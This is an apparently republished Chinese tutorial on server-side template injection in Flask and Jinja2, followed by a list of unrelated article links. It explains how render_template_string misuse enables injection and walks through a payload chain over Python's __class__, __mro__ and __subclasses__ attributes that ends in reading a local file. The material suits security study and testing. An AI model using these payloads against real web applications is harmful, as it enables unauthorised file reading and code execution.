Python-Flask-SSTI
1. Flask框架
Flask是一个轻量级的可定制框架,使用Python语言编写,较其他同类型框架更为灵活、轻便、安全且容易上手。它可以很好地结合MVC模式进行开发,开发人员分工合作,小型团队在短时间内就可以完成功能丰富的中小型网站或Web服务的实现。另外,Flask还有很强的定制性,用户可以根据自己的需求来添加相应的功能,在保持核心功能简单的同时实现功能的丰富与扩展,其强大的插件库可以让用户实现个性化的网站定制,开发出功能强大的网站。
2. flask基础
a. 一个基础的Flask代码
from flask import Flask 导入了Flask框架 app=Flask(__name__)
@app.route('/') route装饰器的作用是将函数与URL绑定起来。这里的作用就是当访问
def index(): 127.0.0.1:5000时,flask就会返回hello flask
return '<h1>hello flask</h1>'
if__name__=='__main__':
app.run(debug=True)
b. 渲染方法 flask的渲染方法有render_template和render_template_string两种
i. render_template()是用来渲染一个指定文件的,使用如下
return render_template('index.html')
ii. render_template_string()则是用来渲染一个字符串的,SSTI与这个方法密不可分。使用方法如下
html = '<h1>This is hello page</h1>'
return render_template_string(html)
c. 不正确的使用flask中的render_template_string方法会引发SSTI。当代码和数据混淆,并且用户输入的数据会和HTML拼接后进行渲染,就可能会产生SSTI
3. jinjia2
a. jinjia2是Flask作者开发的一个模板系统,起初是模仿django模板的一个模板引擎,为Flask提供模板支持,由于其灵活性,快速和安全被广泛使用。
flask是使用Jinjia2来作为渲染引擎的,网站根目录下新建templates文件夹,就是用来存放html文件的。
b. 在jinjia2中有三种语法
控制结构 {% %}
变量取值 {{ }}
注释{# #}
c. jinjia2模板中使用{{ }}语法表示一个变量,它是一种特殊的占位符。当利用jinjia2渲染时,它会把这些特殊的占位符进行填充或者替换,jinjia2支持python中所有的python数据类型,比如列表、字段、对象。
d. jinja2中的过滤器可以理解为是jinja2里面的内置函数和字符串处理函数。
被两个括号包裹的内容会输出其表达式的值
4. 漏洞利用
a. 构造payload的原理
首先要知道python所有类的几个魔法方法:
__class__ 返回类型所属的对象(类)
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__ 返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__ 类的初始化方法
__globals__ 对包含函数全局变量的字典的引用
payload构造思路:从一个内置变量调用__class__.base__等隐藏属性,去找到一个函数,然后调用调用其__globals['builtins']即可调用eval等执行任意代码。
(builtins即是引用,Python程序一旦启动,它就会在程序员所写的代码没有运行之前就已经被加载到内存中了,而对于builtins却不用导入,它在任何模块都直接可见,所以这里直接调用引用的模块)
也就是通过Python的对象的集成来一步步实现文件读取和命令执行的。
b. payload构造步骤
i. 获取字符串的类对象(获取一个类)
>>> 'a'.__class__
<type 'str'>
ii. 2.寻找基类链,找到<type 'object'>类
>>> 'a'.__class__.__mro__
(<type 'str'>, <type 'basestring'>, <type 'object'>)
iii. 3.寻找<type 'object'>类的所有子类中可用的引用类
>>> 'a'.__class__.__mro__[2].__subclasses__()
这里可以看到有一个<type 'file'>类,也就是对文件操作的类,那么可以拿他的方法进行文件读取。
iv. 利用<type 'file'>的read()方法进行文件读取
'a'.__class__.__mro__[2].__subclasses__()[40]('/Users/rebecca/Sites/info.php').read()
原文地址:https://www.cnblogs.com/ersuani/p/13828827.html
- 关于操作权限
- hadoop loadBalance源码分析
- writeup | 应该不是 XSS
- Hbase 源码分析之 Get 流程及rpc原理
- MOCTF WEB 题解
- HBase行锁与MVCC分析
- HBase行锁探索
- Spring Cloud构建微服务架构:分布式服务跟踪(抽样收集)【Dalston版】
- HBase client访问ZooKeeper获取root-region-server DeadLock问题(zookeeper.ClientCnxn Unable to get data of zn
- zookeeper学习系列:四、Paxos算法和zookeeper的关系
- 有了phonegap你还android吗?
- zookeeper学习系列:三、利用zookeeper做选举和锁
- Spring Cloud构建微服务架构:分布式服务跟踪(收集原理)【Dalston版】
- zookeeper学习系列:二、api实践
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Flutter Bloc 官方文档(BlocBuilder翻译)
- OpenGL ES 3.0 | 统一变量和属性的概念与(在程序中的)获取流程、统一变量缓冲区对象详解、std140块规范、用 命名统一变量块 建立 统一变量缓冲区对象 的流程 和 相关API 和...
- 深入浅出SVM(PART III)
- 高频原题——LeetCode题目8:字符串转换整数 (atoi)
- 不转字符串判断——LeetCode题目9:回文数
- 关于双指针的简单理解
- 面试题噩梦之一——LeetCode题目10:正则表达式匹配
- 什么时候触发GC
- 找找数学上的规律——LeetCode题目11:盛最多水的容器
- Java学习笔记, 不断更新
- 这题真是送分——LeetCode题目12:整数转罗马数字
- 该了解一波了!零基础入门Nginx
- 轻松一刻——LeetCode题目13:罗马数字转整数
- 动动手——LeetCode题目14:最长公共前缀
- LeetCode题目15:三数之和